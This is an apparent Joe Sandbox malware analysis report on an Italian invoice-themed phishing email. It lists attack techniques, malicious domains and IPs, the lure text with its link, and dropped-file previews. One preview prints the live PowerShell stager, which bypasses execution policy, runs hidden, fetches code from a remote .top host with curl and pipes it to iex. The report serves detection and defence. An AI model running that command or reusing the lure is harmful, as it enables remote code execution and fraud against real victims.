Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 00000013.00000002.1995057086.00000241A5DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1995057086.00000241A4917000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 00000013.00000002.1995057086.00000241A5DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1995057086.00000241A4917000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tactic | Techniques (a leading number is the signature count badge shown beside the technique)
Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development | 112 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution | 2 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 3 PowerShell; Launchd; Scheduled Task
Persistence | 1 Browser Extensions; 112 Scripting; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts
Privilege Escalation | 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; 1 Extra Window Memory Injection; Network Logon Script; RC Scripts
Defense Evasion | 11 Masquerading; 1 Modify Registry; 131 Virtualization/Sandbox Evasion; 11 Process Injection; 1 DLL Side-Loading; 1 Extra Window Memory Injection
Credential Access | OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery | 21 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 24 System Information Discovery
Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection | Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control | 2 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact | Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://rigzuvzi3bnz3.top/1.php?s=mints13 | 0% | Avira URL Cloud | safe |
http://danknlmmaahlimg.top/thovl94iuyhtr.php?id=user-PC&key=33431133382&s=mints13 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com | 195.110.59.166 | true | true | | unknown
temp.sh | 51.91.79.17 | true | false | | unknown
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
danknlmmaahlimg.top | 206.188.196.37 | true | true | | unknown
www.google.com | 142.250.186.164 | true | false | | high
rigzuvzi3bnz3.top | 168.100.9.29 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://rigzuvzi3bnz3.top/1.php?s=mints13 | true | Avira URL Cloud: safe | unknown
http://danknlmmaahlimg.top/thovl94iuyhtr.php?id=user-PC&key=33431133382&s=mints13 | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
52.113.194.132 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.185.78 | unknown | United States | 15169 | GOOGLEUS | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
206.188.196.37 | danknlmmaahlimg.top | United States | 55002 | DEFENSE-NETUS | true
51.91.79.17 | temp.sh | France | 16276 | OVHFR | false
52.109.89.18 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.111.236.34 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
195.110.59.166 | amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com | Lithuania | 47583 | AS-HOSTINGERLT | true
52.182.143.215 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
2.19.126.151 | unknown | European Union | 16625 | AKAMAI-ASUS | false
52.109.28.47 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.186.164 | www.google.com | United States | 15169 | GOOGLEUS | false
142.250.186.131 | unknown | United States | 15169 | GOOGLEUS | false
64.233.184.84 | unknown | United States | 15169 | GOOGLEUS | false
184.28.90.27 | unknown | United States | 16625 | AKAMAI-ASUS | false
199.232.210.172 | bg.microsoft.map.fastly.net | United States | 54113 | FASTLYUS | false
168.100.9.29 | rigzuvzi3bnz3.top | United States | 3700 | CLOUD9US | true
                          IP
                          192.168.2.18
                          127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557495
Start date and time: 2024-11-18 10:44:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Sample name: I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg
Detection: MAL
Classification: mal100.troj.expl.evad.winMSG@34/32@7/187
Cookbook Comments:
• Found application associated with file extension: .msg
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.109.89.18, 184.28.90.27, 52.109.28.47, 2.19.126.151, 2.19.126.160, 52.111.236.34, 52.111.236.35, 52.111.236.32, 52.111.236.33, 52.113.194.132, 199.232.210.172
• Excluded domains from analysis (whitelisted): omex.cdn.office.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, a1864.dscd.akamai.net, ecs.office.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, uks-azsc-000.roaming.officeapps.live.com, nleditor.osi.office.net, prod-eu-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, s-0005.s-msedge.net, config.officeapps.live.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, eur
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg
Input | Output
                          URL: email Model: Joe Sandbox AI
                          {
                              "explanation": [
                                  "Contains a suspicious external link to 'livecasinotipuk.com' which is not a legitimate business domain",
                                  "Uses urgency and threats of legal action to pressure recipient into clicking the link",
                                  "Claims to be about an unpaid invoice but provides no legitimate payment methods, only a suspicious link"
                              ],
                              "phishing": true,
                              "confidence": 9
                          }
                          {
                              "date": "Mon, 18 Nov 2024 10:41:46 +0100", 
                              "subject": "I: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l..", 
                              "communications": [
                                  "SPAM ?\n\n \n\nDa: gianluca.mucciolo80@pec.it <gianluca.mucciolo80@pec.it> \nInviato: luned 18 novembre 2024 02:10\nA: Cuzziol beverage s.r.l. <cuzziolbeveragesrl@pec.it>\nOggetto: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l..\n\n \n\nBuongiorno,\nCuzziol beverage s.r.l.\nCon sede in Santa lucia di piave(tv) Via Maiorana 1 \n\n05050740264\n\n \n\nCon la presente comunicazione, intendo attirare la Sua attenzione sul fatto che in virt del contratto stipulato il 10/05/2024, Lei ha assunto l'impegno di corrispondermi l'importo di euro 562,13. A tutt'oggi, non ho ancora ricevuto il pagamento nonostante i molteplici solleciti gi inviati.\nLa avviso che, se non provveder al pagamento spontaneamente entro cinque giorni dalla ricezione della presente, sar costretto/a ad affidare la pratica al mio avvocato per l'avvio delle procedure legali di recupero del credito, senza inviare ulteriori avvisi o solleciti. Si precisa che questa comunicazione costituisce una formale messa in mora e interrompe la prescrizione.\n\n\n \n\nE' possibile scaricare la fattura tramite il link sottostante: Fattura <https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L>   \n\nCordiali saluti,\n\n"
                              ], 
                              "from": "Franco Bin <franco.bin@cuzziol.it>", 
                              "to": "Andrea Ceccherini <andrea.ceccherini@cuzziol.it>", 
                              "attachements": []
                          }
                          URL: Email Model: Joe Sandbox AI
                          {
                            "contains_trigger_text": true,
                            "trigger_text": "Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l.",
                            "prominent_button_name": "unknown",
                            "text_input_field_labels": [
                              "Da: gianluca.murcio030@pec.it <gianluca.murcio030@pec.it>",
                              "Inviato: luned 18 novembre 2024 02:10",
                              "A: Cuzziol beverage s.r.l. <cuzziolbeverage@pec.it>",
                              "Oggetto: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l.",
                              "Buongiorno, Cuzziol beverage s.r.l. Con sede in Santa lucia di pianeve(tv) Via Maiorana 1 05057/40264 Con la presente comunicazione, intendo attirare la Sua attenzione su fatto che in virt del contratto stipulato il 10/05/2024, Lei ha assunto l'impegno di corrispondermi l'importo di euro 562,15. A tutt'oggi non ho ancora ricevuto il pagamento nonostante i molteplici solleciti gi inviati. La avviso che, se non provveder al pagamento spontaneamente entro cinque giorni dalla ricezione della presente, sar costretto ad attivare la pratica al mio avvocato per l'avvio delle procedure legali di recupero del credito, senza ulteriori avvisi o solleciti. Si precisa che questa comunicazione costituisce una formale messa in mora e interrompe la prescrizione."
                            ],
                            "pdf_icon_visible": false,
                            "has_visible_captcha": false,
                            "has_urgent_text": true,
                            "has_visible_qrcode": false
                          }
                          ```
                          URL: Email Model: Joe Sandbox AI
                          ```json
                          {
                            "brands": [
                              "Cuzziol beverage s.r.l."
                            ]
                          }
                          ```
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.3267872124816983
                          Encrypted:false
                          SSDEEP:
                          MD5:2B2237555C379C62A1483B671E0BCA1F
                          SHA1:1CE73D3A73DCFE20C69ACB1304BEABBC933A562B
                          SHA-256:6558483267581D689BD1961AFF85C5F8D390250C9A216BE6BF79FB6D0E0865DF
                          SHA-512:B9B57F210278296AD9B70B961A977DB10E87B5367F8E954DC170184988F7DFC0CE223BC0D4F9B84906511705573D9AE9B651A43D401C70C2718977856BDB4CA2
                          Malicious:false
                          Reputation:unknown
                          Preview:=...........@..@"....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..................................-L......#.........`h.................h...............X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.08119845817648715
                          Encrypted:false
                          SSDEEP:
                          MD5:0CBAA17950919A0F6F2EFB541685D96B
                          SHA1:85ECFCBDA9B7CC049A256A7442C988A6FC30B3C9
                          SHA-256:4B16DF1AD9C958B841EBB1E17841AEC50B735187116D2C5977BDA15FEBA0EB50
                          SHA-512:178B9FDCA4FBDE98C8C48FFBA5CF20477D7B059F85BFFBD0919415DC6BAD27151032C40610A7E1F1C3B9D7EF03F873F03DF5C59CE36363E6BB24FBDEE4889087
                          Malicious:false
                          Reputation:unknown
                          Preview:...V.....................................;...{..#,...|.......{...............{.......{..:..O.....{.H..................L.#,...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF, LF line terminators
                          Category:modified
                          Size (bytes):438
                          Entropy (8bit):3.5828660543288606
                          Encrypted:false
                          SSDEEP:
                          MD5:ECD24DE295E0FD7DAECFB64E6EFE3A0F
                          SHA1:B5AF2B4C7E384C146B1A1C40A13F8411BE3F5FA9
                          SHA-256:C6FABBCC4D97BE38E4569D1011EE1EA42136A15D7B1CE6BBAC07F6634CCBA4C0
                          SHA-512:6179F4621B75CF759B66EE8D0415B4D53141BCD47EA6E6B114FFF0511DFF0D2A47D0DDD936CC8A219E344188BE0958C6C8F3B38AAB0F715BC07F85057AEE482F
                          Malicious:true
                          Reputation:unknown
                          Preview:..p.o.w.e.r.s.h.e.l.l. .-.n.o.p.r.o.f.i.l.e. .-.e.x.e.c.u.t.i.o.n.p.o.l.i.c.y. .b.y.p.a.s.s. .-.W.i.n.d.o.w.S.t.y.l.e. .h.i.d.d.e.n. .-.c. .C.o.n.t.i.n.u.e. .=. .".C.o.n.t.i.n.u.e."...c.u.r.l. .-.u.s.e.b. .".h.t.t.p.:././.r.i.g.z.u.v.z.i.3.b.n.z.3...t.o.p./.1...p.h.p.?.s.=.m.i.n.t.s.1.3.". .|. .i.e.x.;...R.e.m.o.v.e.-.I.t.e.m. .".C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.D.o.c.u.m.e.n.t.s.\.A.N.w.i.b.h.L.H.f.y.r.t...p.s.1.". .-.F.o.r.c.e. .....
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):338
                          Entropy (8bit):3.4419296566325905
                          Encrypted:false
                          SSDEEP:
                          MD5:D6A6C1FF49BA08B0E622E8D4F9CA0C07
                          SHA1:4E290C6F8DF5D1692B5C8D8F2F0AACA015D3E087
                          SHA-256:8E95988A2AC84CCED17061DCA7BB1DA4CF5D4CB44410AFC1A29457B11ACD2B48
                          SHA-512:C03DE63ABEAB2C029B303AF180454B79E74FD4B55AF904B300D4FFF03A4611D95ADB43A85F4125FAD6946CD3E0033DF1B7D461535A6261C82BE667C6349B4591
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... .........e.}.9..(...............................................9p,.VZ.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):231348
                          Entropy (8bit):4.389535555421031
                          Encrypted:false
                          SSDEEP:
                          MD5:5A3ACD8AD956A70BA6162F6B30766269
                          SHA1:8F577E86DB8615C593E4BA1A315432B5DE71FC97
                          SHA-256:3C869D3E3F7CBF8F675742BD8ED9D50C28C4DFD120D2A9FADA63E865330824DF
                          SHA-512:25E4D871B7CAF02AF12D02C435178B8DDA42884467BC680143827843E2E17826F0FCC3B18AD093841CDA19B9D3B994E447A7DE713AF41869BB5DE478756494B9
                          Malicious:false
                          Reputation:unknown
                          Preview:TH02...... ..=.q.9......SM01X...,......q.9..........IPM.Activity...........h...............h............H..h..g........H...h........0...H..h\nor ...ppDa...h.N..0...p.g....h../!...........h........_`.k...h./!@...I..w...h....H...8..k...0....T...............d.........2h...............k..............!h.............. h..J......g...#h....8.........$h0.......8....."h(Y.......Y....'h..............1h../!<.........0h....4....k../h....h......kH..hX...p.....g...-h .........g...+h../!......g................. ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):180335
                          Entropy (8bit):5.289247703746802
                          Encrypted:false
                          SSDEEP:
                          MD5:26603FB93257A44E1AF7423CDC623267
                          SHA1:2792CC6F5AFB4366A2C50B0786D9F9C20B0BF4BD
                          SHA-256:E4CC094454AA11499550CA6847785E0D1F84EA556FE33DCB0A9EE5F5F85B762C
                          SHA-512:62B2973F72588D55C612C938F6725E810DAAF76C4A04D77C5646B5DB74A8F46399A1ADA1B127E950CB5903C9482B0DBBC0904503D26C97207DB3EB732843A472
                          Malicious:false
                          Reputation:unknown
                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-11-18T09:44:38">.. Build: 16.0.18307.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):0.09216609452072291
                          Encrypted:false
                          SSDEEP:
                          MD5:F138A66469C10D5761C6CBB36F2163C3
                          SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                          SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                          SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):4616
                          Entropy (8bit):0.13760166725504608
                          Encrypted:false
                          SSDEEP:
                          MD5:2E9B814D0A19E8E114D9B0BE33A9704D
                          SHA1:988AB0D6247DB3AC28A1C51986CD4D73C9A11A47
                          SHA-256:FAF7C496801BC87A6D81401D4700BED312601A27BB71EB27824E3AD7DE390750
                          SHA-512:FCD52512E2097A56EC47776C8896F201B3052343922DCD9EE50806A34BC738065E07E6B0A2BA3A79AEFA11ECCB27C80BBB12B952958A9BC2EBDB325A1332E760
                          Malicious:false
                          Reputation:unknown
                          Preview:.... .c......,.`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):32768
                          Entropy (8bit):0.0446603401158491
                          Encrypted:false
                          SSDEEP:
                          MD5:33344E2615644406E88F9FC3E524BE3B
                          SHA1:38FCECE17B65C10BD0205DF189A96DD826F15789
                          SHA-256:CFB126B396800ABA5E92B6D15CCED9967CFD1010F8E6C4796F94FD96135F0191
                          SHA-512:A03CC06DE5068826650C9200806B0FF18B4AFCF12D1E69671DE072F1C4A6301029B960CF008714A16D9E1F1A5D4F77901AE487BA77124797E409DFA67E2FF81F
                          Malicious:false
                          Reputation:unknown
                          Preview:..-......................k...A.1uQ[.y..q..D.....-......................k...A.1uQ[.y..q..D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:SQLite Write-Ahead Log, version 3007000
                          Category:modified
                          Size (bytes):45352
                          Entropy (8bit):0.39375634669262305
                          Encrypted:false
                          SSDEEP:
                          MD5:49AF04B0AEAE9283DDBDB61EE6EC0B45
                          SHA1:0F8872B219CE581383315FD301EB2D882C35F4C7
                          SHA-256:71B8997697B86D88AD4C39FE4A75F063BB3408305EB4A05D95EEB326A20AB903
                          SHA-512:B111982759B9FBCC8282D0C50D5FE3E6B42A0B3BE0FE84586AF0045423E180354D2B266DBB941EB51941DCE1D6E1BDB1125B95C1FEA40563D398F7ADDE570CB0
                          Malicious:false
                          Reputation:unknown
                          Preview:7....-..........uQ[.y..BT.............uQ[.y........SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):3604
                          Entropy (8bit):3.049990037469824
                          Encrypted:false
                          SSDEEP:
                          MD5:C0BABBCF22BB28A9FA44FCE4020F0DA5
                          SHA1:26342B866FCEDBD24A4CD3B4832AD73746141446
                          SHA-256:0643206BF5A02345C7D4CE5EF63E07104782990F3550C1547D684A70CD8C8CFC
                          SHA-512:28E4691742B4DB9108DA4A5F82C8D4998B5EC7B8C7B6B4214AF38B0830A384C43CF48114E40A96CC7C418D9F7FD56F0939F4A30F4FD3F541AB19084C1860BFC7
                          Malicious:false
                          Reputation:unknown
                          Preview:....S.P.A.M. .?.....D.a.:. .g.i.a.n.l.u.c.a...m.u.c.c.i.o.l.o.8.0.@.p.e.c...i.t. .<.g.i.a.n.l.u.c.a...m.u.c.c.i.o.l.o.8.0.@.p.e.c...i.t.>. ...I.n.v.i.a.t.o.:. .l.u.n.e.d... .1.8. .n.o.v.e.m.b.r.e. .2.0.2.4. .0.2.:.1.0...A.:. .C.u.z.z.i.o.l. .b.e.v.e.r.a.g.e. .s...r...l... .<.c.u.z.z.i.o.l.b.e.v.e.r.a.g.e.s.r.l.@.p.e.c...i.t.>...O.g.g.e.t.t.o.:. .................................................................................................................................................................................................8...P...T...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):19253
                          Entropy (8bit):5.005843281975463
                          Encrypted:false
                          SSDEEP:
                          MD5:0EBE1B1B3D46E15D27180236D843E5A0
                          SHA1:349D843E6829B7FF9A0A78BF63484F18193F5441
                          SHA-256:BCFD0A64AC8A082F90C720B273594F7AD149275D04A0F165E967F7DF922F1D99
                          SHA-512:4B685C5512A2BE6707EC1659967F5467DF7889C2A8A7B4A0D4A6122414CBB40079777AA760526760DB92C713DE2C80B1D35E19FD3F8824DA255C01791E7E4C33
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):10736
                          Entropy (8bit):5.379101249454861
                          Encrypted:false
                          SSDEEP:
                          MD5:9301A33DCAA58EAFBC48DC660F16811D
                          SHA1:1F47843EA912D476CE061DE9154310CE1FC50E7F
                          SHA-256:6FA652EEE5E03ABA03B62E091D94B3067BD7308DD6853652D67AE5F8533421FA
                          SHA-512:079D2B911E0B68F06071E6CEE36A8B2A81F266B653D3F5A7B08058C5D926138F7DF9C5999929BC5C36F9860A91C2749FEFBA9E10B67621112C305E1D81616952
                          Malicious:false
                          Reputation:unknown
                          Preview:@...e................................................@..........H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....u.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.................................................V.@.Ig@.Eg@.:5@.95@...@.X.@.J.@.Z.@.^.@.aT@.[T@..T@..S@.{T@..S@..T@..S@._.@..T@..T@.VX@.UX@./T@.
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):20971520
                          Entropy (8bit):0.009670002543437096
                          Encrypted:false
                          SSDEEP:
                          MD5:AE31E369B3CFB1DBFA309D8310122BA4
                          SHA1:0480EDF04CA8493AAE7C3C36CACFE27215E8E7F9
                          SHA-256:34DC606E66C5CF2A577DB4D7D08389D21F3D091887348D54EBEF50C0139356D9
                          SHA-512:34684D88D7C5C7C8266D881668F2F6E328CDD80D3416A50C12A69668026E89CB4EE3B802A392EF3607C726D03532CB21EEA72290F78924B87AB05E6E46D9B1C9
                          Malicious:false
                          Reputation:unknown
                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/18/2024 09:44:36.710.OUTLOOK (0xB88).0x16A8.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.System.GracefulExit.GracefulAppExitDesktop","Flags":33777014402039809,"InternalSequenceNumber":17,"Time":"2024-11-18T09:44:36.710Z","Data.PreviousAppMajor":16,"Data.PreviousAppMinor":0,"Data.PreviousAppBuild":16827,"Data.PreviousAppRevision":20130,"Data.PreviousSessionId":"CAA672D9-4C24-4A61-BD58-E96887DB2895","Data.PreviousSessionInitTime":"2024-11-18T09:44:20.614Z","Data.PreviousSessionUninitTime":"2024-11-18T09:44:23.755Z","Data.SessionFlags":2147483652,"Data.InstallMethod":0,"Data.OfficeUILang":1033,"Data.PreviousBuild":"Unknown","Data.EcsETag":"\"\"","Data.ProcessorArchitecture":"x64"}...11/18/2024 09:44:36.758.OUTLOOK (0xB88).0x454.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"T
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
